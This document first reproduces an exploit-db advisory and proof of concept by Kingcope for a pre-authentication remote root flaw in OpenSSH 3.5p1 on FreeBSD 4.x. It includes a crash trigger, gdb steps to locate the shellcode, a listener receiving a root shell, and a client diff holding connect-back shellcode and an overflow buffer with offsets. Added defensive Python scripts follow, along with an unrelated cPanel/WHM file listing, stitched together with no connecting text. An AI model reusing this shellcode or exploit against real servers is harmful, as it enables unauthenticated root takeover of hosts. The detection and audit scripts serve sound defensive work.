OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

Discovered and Exploited By Kingcope
Year 2011
--
The last two days I have been investigating a vulnerability in OpenSSH
affecting at least FreeBSD 4.9 and 4.11. These FreeBSD versions run
OpenSSH 3.5p1 in the default install.
The sshd banner for 4.11-RELEASE is "SSH-1.99-OpenSSH_3.5p1 FreeBSD-20060930".
A working Remote Exploit which spawns a root shell remotely and
previous to authentication was developed.
The bug can be triggered both through ssh version 1 and ssh version 2
using a modified ssh client. During the investigation of the vulnerability it was found that
the bug resides in the source code file "auth2-pam-freebsd.c".
http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/Attic/auth2-pam-freebsd.c
This file does not exist in FreeBSD releases greater than 5.2.1. The last commit
is from 7 years ago.
Specifically the bug follows a code path in the PAM Authentication Thread inside this
source code, "pam_thread()". It could not be verified if the bug is inside this
(third party, freebsd) OpenSSH code or in the FreeBSD pam library itself.
Both the challenge response (ssh version 1) and keyboard interactive via pam
(ssh version 2) authentications go through this code path.
By supplying a long username to the daemon the sshd crashes.
h4x# sysctl kern.sugid_coredump=1
kern.sugid_coredump: 0 -> 1
root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138
h4x# tail -1 /var/log/messages
Jun 30 16:01:25 h4x /kernel: pid 160 (sshd), uid 0: exited on signal 11 (core dumped)
Looking into the coredump reveals:
h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x28092305 in ?? ()
(gdb) x/1i $eip
0x28092305:     (bad)
The sshd crashes at a place with illegal instructions. It looks like it depends
on how the sshd is started. Starting the sshd from the console as root and running
the ssh client with long username again reveals:
h4x# killall -9 sshd
h4x# /usr/sbin/sshd
root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138
h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) x/10i $eip
0x41414141:     Cannot access memory at address 0x41414141.
As you can see in the above gdb output we can control EIP completely.
If someone finds out on what this behaviour depends, especially why EIP can
be controlled when starting sshd in the console and can not be easily controlled
when being run from the boot sequence, please drop me an email at
isowarez.isowarez.isowarez (at) googlemail.com
Anyhow this procedure shows that the sshd can be exploited because the instruction
pointer can be fully controlled.
The developed exploit (Proof of Concept only) is a patched OpenSSH 5.8p2 client.
Using a reverse shellcode it will spawn a rootshell.
Only one offset is needed, the position of the shellcode can be found the following way:
h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) set $x=0x08071000
(gdb) while(*++$x!=0x90909090)
>end
(gdb) x/10b $x
The printed address is the beginning of the shellcode nopsled.
Attached is the Proof of Concept as a diff to OpenSSH-5.8p2.
It roughly does the following:
root@debian:~# ./ssh -1 192.168.32.138
root@debian:~# nc -v -l -p 10000
listening on [any] 10000 ...
192.168.32.138: inverse host lookup failed: Unknown host
connect to [192.168.32.128] from (UNKNOWN) [192.168.32.138] 1038
uname -a;id;
FreeBSD h4x.localdomain 4.11-RELEASE FreeBSD 4.11-RELEASE #0: Fri Jan 21 17:21:22 GMT 2005     root (at) perseus.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=0(root) gid=0(wheel) groups=0(wheel)
--
root@debian:~# diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,717
> // Connect Back Shellcode
>
> #define       IPADDR  "xc0xa8x20x80"
> #define PORT  "x27x10"              /* htons(10000) */
>
> char sc[] =
>    "x90x90"
>    "x90x90"
>    "x31xc9"                 // xor    ecx, ecx
>    "xf7xe1"                 // mul    ecx
>    "x51"                     // push   ecx
>    "x41"                     // inc    ecx
>    "x51"                     // push   ecx
>    "x41"                     // inc    ecx
>    "x51"                     // push   ecx
>    "x51"                     // push   ecx
>    "xb0x61"                 // mov    al, 97
>    "xcdx80"                 // int    80h
>    "x89xc3"                 // mov    ebx, eax
>    "x68"IPADDR                       // push   dword 0101017fh
>    "x66x68"PORT             // push   word 4135
>    "x66x51"                 // push   cx
>    "x89xe6"                 // mov    esi, esp
>    "xb2x10"                 // mov    dl, 16
>    "x52"                     // push   edx
>    "x56"                     // push   esi
>    "x50"                     // push   eax
>    "x50"                     // push   eax
>    "xb0x62"                 // mov    al, 98
>    "xcdx80"                 // int    80h
>    "x41"                     // inc    ecx
>    "xb0x5a"                 // mov    al, 90
>    "x49"                     // dec    ecx
>    "x51"                     // push   ecx
>    "x53"                     // push   ebx
>    "x53"                     // push   ebx
>    "xcdx80"                 // int    80h
>    "x41"                     // inc    ecx
>    "xe2xf5"                 // loop   -10
>    "x51"                     // push   ecx
>    "x68x2fx2fx73x68"     // push   dword 68732f2fh
>    "x68x2fx62x69x6e"     // push   dword 6e69622fh
>    "x89xe3"                 // mov    ebx, esp
>    "x51"                     // push   ecx
>    "x54"                     // push   esp
>    "x53"                     // push   ebx
>    "x53"                     // push   ebx
>    "xb0xc4x34xff"
>    "xcdx80";                // int    80h
>
679a730,737
>       char buffer[8096];
>
>       // Offset is for FreeBSD-4.11 RELEASE OpenSSH 3.5p1
>       memcpy(buffer, "AAAAx58xd8x07x08""CCCCDDDDEEEExd8xd8x07x08""GGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO", 24);
>       memset(buffer+24, 'x90', 5000);
>       memcpy(buffer+24+5000, sc, sizeof(sc));
>       server_user=buffer;
>
690a749
>
Cheers,

Kingcope

 

Source: http://www.exploit-db.com/exploits/17462/
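As an added defender-side example (not part of Kingcope's advisory and not OpenSSH or FreeBSD code): the advisory quotes two artefacts a defender can observe on an affected host, the sshd version banner ("SSH-1.99-OpenSSH_3.5p1 FreeBSD-20060930") and the kernel log line written when the root sshd dies on signal 11. The block below parses both from constructed sample input. The sample log lines, the alert threshold and the check for a FreeBSD vendor tag are assumptions of this example, chosen to match the scope the advisory states (OpenSSH 3.5p1 as shipped with FreeBSD 4.x).

```python
import re

# Constructed sample lines modelled on the /var/log/messages entry quoted in
# the advisory (FreeBSD 4.x kernel reporting a process that died on a signal).
SAMPLE_LOG = """\
Jun 30 16:01:25 h4x /kernel: pid 160 (sshd), uid 0: exited on signal 11 (core dumped)
Jun 30 16:01:40 h4x sshd[161]: Accepted publickey for alice from 192.168.32.5 port 40212 ssh2
Jun 30 16:02:03 h4x /kernel: pid 162 (sshd), uid 0: exited on signal 11 (core dumped)
Jun 30 16:02:10 h4x /kernel: pid 170 (httpd), uid 80: exited on signal 11 (core dumped)
Jun 30 16:03:00 h4x /kernel: pid 175 (sshd), uid 0: exited on signal 6 (core dumped)
"""

# Kernel "exited on signal" line as written by FreeBSD 4.x syslog.
CRASH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) /kernel: "
    r"pid (?P<pid>\d+) \((?P<proc>[^)]+)\), uid (?P<uid>\d+): "
    r"exited on signal (?P<sig>\d+)"
)

# SSH identification string: protocol, OpenSSH version, optional vendor tag.
BANNER_RE = re.compile(
    r"^SSH-(?P<proto>[\d.]+)-OpenSSH_(?P<ver>\S+)(?:\s+(?P<vendor>.*))?$"
)


def crash_events(lines, proc="sshd"):
    """Parse kernel 'exited on signal' lines and keep those for the named process."""
    events = []
    for line in lines:
        m = CRASH_RE.match(line)
        if m and m.group("proc") == proc:
            events.append({
                "ts": m.group("ts"),
                "pid": int(m.group("pid")),
                "uid": int(m.group("uid")),
                "signal": int(m.group("sig")),
            })
    return events


def segfault_alert(lines, threshold=2):
    """True when the uid-0 sshd died on SIGSEGV at least `threshold` times.

    One crash may be an ordinary bug; repeated SIGSEGV in the root listener is
    the footprint the advisory's long-username trigger leaves in the log.
    The threshold is an assumption of this example.
    """
    segv = [e for e in crash_events(lines) if e["signal"] == 11 and e["uid"] == 0]
    return len(segv) >= threshold


def banner_is_affected(banner):
    """Match the build the advisory names: OpenSSH_3.5p1 carrying a FreeBSD tag."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return False
    vendor = m.group("vendor") or ""
    return m.group("ver") == "3.5p1" and vendor.startswith("FreeBSD")


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for e in crash_events(lines):
        print("sshd pid %(pid)d (uid %(uid)d) died on signal %(signal)d at %(ts)s" % e)
    print("alert:", segfault_alert(lines))
    print("banner affected:", banner_is_affected("SSH-1.99-OpenSSH_3.5p1 FreeBSD-20060930"))
```

On a live host the same functions can be fed the output of `tail -f /var/log/messages` and the banner read from the first line the daemon sends on port 22; the banner check only confirms the version string, so it should be paired with the patch level of the installed OpenSSH.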

cPanel/WHM directory structure (essential files for normal operation)

Apache

/usr/local/apache
+ bin – apache binaries are stored here – httpd, apachectl, apxs

+ conf – configuration files – httpd.conf

+ cgi-bin

+ domlogs – domain log files are stored here

+ htdocs

+ include – header files

+ libexec – shared object (.so) files are stored here – libphp4.so,mod_rewrite.so

+ logs – apache logs – access_log, error_log, suexec_log

+ man – apache manual pages

+ proxy –

+ icons –

Cpanel script to restart apache – /scripts/restartsrv_httpd

Start httpd with ssl – /etc/init.d/httpd startssl

DNS – Named(Bind)

Program: /usr/sbin/named

Init Script: /etc/rc.d/init.d/named

/etc/named.conf

db records:/var/named/

/var/log/messages

Exim

Conf : /etc/exim.conf – exim main configuration file

/etc/localdomains – list of domains allowed to relay mail

Log : /var/log/exim_mainlog – incoming/outgoing mails are logged here

/var/log/exim_rejectlog – exim rejected mails are reported here

/var/log/exim_paniclog – exim errors are logged here

Mail queue: /var/spool/exim/input

Cpanel script to restart exim – /scripts/restartsrv_exim

Email forwarders and catchall address file – /etc/valiases/domainname.com

Email filters file – /etc/vfilters/domainname.com

POP user authentication file – /home/username/etc/domainname/passwd

catchall inbox – /home/username/mail/inbox

POP user inbox – /home/username/mail/domainname/popusername/inbox

POP user spambox – /home/username/mail/domainname/popusername/spam

Program : /usr/sbin/exim (setuid root – -rwsr-xr-x 1 root root)

Init Script: /etc/rc.d/init.d/exim

Mysql

Program : /usr/bin/mysql

Init Script : /etc/rc.d/init.d/mysql

Conf : /etc/my.cnf, /root/.my.cnf

Data directory – /var/lib/mysql – Where all databases are stored.

Database naming convention – username_dbname (eg: john_sales)

Permissions on databases – drwx 2 mysql mysql

Socket file – /var/lib/mysql/mysql.sock, /tmp/mysql.sock

SSHD

Program :/usr/local/sbin/sshd

Init Script :/etc/rc.d/init.d/sshd

/etc/ssh/sshd_config

Log: /var/log/messages

ProFTPD

Program :/usr/sbin/proftpd

Init Script :/etc/rc.d/init.d/proftpd

Conf: /etc/proftpd.conf

Log: /var/log/messages, /var/log/xferlog

FTP accounts file – /etc/proftpd/username – all ftp accounts for the domain are listed here

Pure-FTPD

Program : /usr/sbin/pure-ftpd

Init Script :/etc/rc.d/init.d/pure-ftpd

Conf: /etc/pure-ftpd.conf

Anonymous ftp document root – /etc/pure-ftpd/ip-address

Perl

Program :/usr/bin/perl

Directory :/usr/lib/perl5/5.6.1/

PHP

Program :/usr/local/bin/php, /usr/bin/php

ini file: /usr/local/lib/php.ini – apache must be restarted after any change to this file

Cpanel

/usr/local/cpanel

+ 3rdparty/ – tools like fantastico, mailman files are located here

+ addons/ – AdvancedGuestBook, phpBB etc

+ base/ – phpmyadmin, squirrelmail, skins, webmail etc

+ bin/ – cpanel binaries

+ cgi-sys/ – cgi files like cgiemail, formmail.cgi, formmail.pl etc

+ logs/ – cpanel access log and error log

+ whostmgr/ – whm related files

WHM

/var/cpanel – whm files

+ bandwidth/ – rrd files of domains

+ username.accts – reseller accounts are listed in this file

+ packages – hosting packages are listed here

+ root.accts – root owned domains are listed here

+ suspended – suspended accounts are listed here

+ users/ – cpanel user files – theme, bwlimit, addon, parked and sub-domains are all listed in these files

+ zonetemplates/ – dns zone template files are taken from here

Important cpanel/whm files

/usr/local/apache/conf/httpd.conf – apache configuration file

/etc/exim.conf – mail server configuration file

/etc/named.conf – name server (named) configuration file

/etc/proftpd.conf – proftpd server configuration file

/etc/pure-ftpd.conf – pure-ftpd server configuration file

/etc/valiases/domainname – catchall and forwarders are set here

/etc/vfilters/domainname – email filters are set here

/etc/userdomains – all domains are listed here – addons, parked,subdomains along with their usernames

/etc/localdomains – exim related file – all domains should be listed here to be able to send mails

/var/cpanel/users/username – cpanel user file

/var/cpanel/cpanel.config – cpanel configuration file ( Tweak Settings )*

/etc/cpbackup-userskip.conf –

/etc/sysconfig/network – Networking Setup*

/etc/hosts –

/var/spool/exim –

/var/spool/cron –

/etc/resolv.conf – Networking Setup–> Resolver Configuration

/etc/nameserverips – Networking Setup–> Nameserver IPs (for resellers to give their nameservers)

/var/cpanel/resellers – For addpkg, etc permissions for resellers.

/etc/chkserv.d – Main >> Service Configuration >> Service Manager *

/var/run/chkservd – Main >> Server Status >> Service Status *

/var/log/dcpumon – top log process

/root/cpanel3-skel – skel directory. Eg: public_ftp, public_html. (AccountFunctions–>Skeleton Directory )*

/etc/wwwacct.conf – account creation defaults file in WHM (Basic cPanel/WHM Setup)*

/etc/cpupdate.conf – Update Config *

/etc/cpbackup.conf – Configure Backup*

/etc/clamav.conf – clamav (antivirus configuration file )

/etc/my.cnf – mysql configuration file

/usr/local/Zend/etc/php.ini OR /usr/local/lib/php.ini – php configuration file

/etc/ips – ip addresses on the server (except the shared ip) (IP Functions–>Show IP Address Usage )*

/etc/ipaddrpool – ip addresses which are free

/etc/ips.dnsmaster – name server ips

/var/cpanel/Counters – per-user counters are kept here

/var/cpanel/bandwidth – bandwidth usage of domains is kept here

Source: http://wirednless.com/2009/01/cpanel-directory-and-files/
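As an added example (not part of the listing's source, and not cPanel's own tooling): the files above include mail routing, database credentials (/root/.my.cnf), account lists and a setuid-root binary (/usr/sbin/exim), so a quick permission audit of exactly these paths is worth keeping. The block below resolves the listed paths under a chosen root and reports files that are missing, symlinked, not root-owned or readable by others, directories that grant any access to "others", and setuid binaries without the setuid bit or writable by the group. The baseline it encodes (root-owned, nothing readable by others) is an assumed hardening target, not cPanel's shipped defaults; the staging tree in `build_demo_tree()` is constructed for the demonstration.

```python
import os
import stat
import tempfile

# Configuration and account files named in the listing above.
SENSITIVE_FILES = [
    "/etc/exim.conf", "/etc/named.conf", "/etc/proftpd.conf", "/etc/pure-ftpd.conf",
    "/etc/my.cnf", "/root/.my.cnf", "/etc/wwwacct.conf", "/etc/cpbackup.conf",
    "/etc/cpupdate.conf", "/var/cpanel/cpanel.config", "/etc/userdomains",
    "/etc/nameserverips",
]

# Directories from the listing holding per-user data; the listing gives
# /var/lib/mysql as drwx------ (mysql:mysql), so any "other" bit is reported.
SENSITIVE_DIRS = ["/var/lib/mysql", "/var/cpanel/users", "/etc/valiases", "/etc/vfilters"]

# The listing notes exim is installed setuid root (-rwsr-xr-x root root).
SUID_BINARIES = ["/usr/sbin/exim"]


def audit_paths(root="/", owner_uid=0):
    """Return a list of (path, finding) tuples for the paths above.

    root      -- prefix under which the paths are resolved ("/" on the live
                 host; a staging tree in the demo).
    owner_uid -- uid expected to own config files and setuid binaries
                 (0 on a real server). Assumed baseline, not cPanel defaults.
    """
    findings = []
    for path in SENSITIVE_FILES + SENSITIVE_DIRS + SUID_BINARIES:
        full = os.path.join(root, path.lstrip("/"))
        try:
            st = os.lstat(full)
        except FileNotFoundError:
            findings.append((path, "missing"))
            continue
        if stat.S_ISLNK(st.st_mode):
            findings.append((path, "symlink"))  # config replaced by a link elsewhere
            continue
        mode = stat.S_IMODE(st.st_mode)
        if path in SENSITIVE_DIRS:
            if mode & (stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH):
                findings.append((path, "accessible to others"))
            continue
        if st.st_uid != owner_uid:
            findings.append((path, "unexpected owner uid %d" % st.st_uid))
        if mode & stat.S_IWOTH:
            findings.append((path, "world-writable"))
        if path in SUID_BINARIES:
            if not mode & stat.S_ISUID:
                findings.append((path, "setuid bit not set"))
            if mode & stat.S_IWGRP:
                findings.append((path, "group-writable setuid binary"))
        elif mode & stat.S_IROTH:
            findings.append((path, "readable by others"))
    return findings


def build_demo_tree():
    """Constructed staging tree mixing safe and unsafe modes (demo input only)."""
    root = tempfile.mkdtemp(prefix="cpanel-audit-")
    files = {
        "etc/exim.conf": 0o644,    # readable by others: reported
        "etc/my.cnf": 0o600,       # fine
        "root/.my.cnf": 0o600,     # fine
        "usr/sbin/exim": 0o4755,   # setuid, not group/world writable: fine
    }
    dirs = {
        "var/lib/mysql": 0o700,    # fine
        "var/cpanel/users": 0o755, # others can list account files: reported
    }
    for rel, mode in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("# constructed sample\n")
        os.chmod(full, mode)
    for rel, mode in dirs.items():
        full = os.path.join(root, rel)
        os.makedirs(full, exist_ok=True)
        os.chmod(full, mode)
    return root


def demo():
    """Audit the constructed tree; the current user stands in for root."""
    return audit_paths(build_demo_tree(), owner_uid=os.getuid())


if __name__ == "__main__":
    for path, finding in demo():
        print("%-28s %s" % (path, finding))
```

Run as root with the defaults (`audit_paths()`) to check the live host; every "missing" result for a file the listing marks as optional (backup or update config) can be ignored, while a "symlink", "world-writable" or "readable by others" result on /root/.my.cnf or /etc/exim.conf should be treated as a credential exposure.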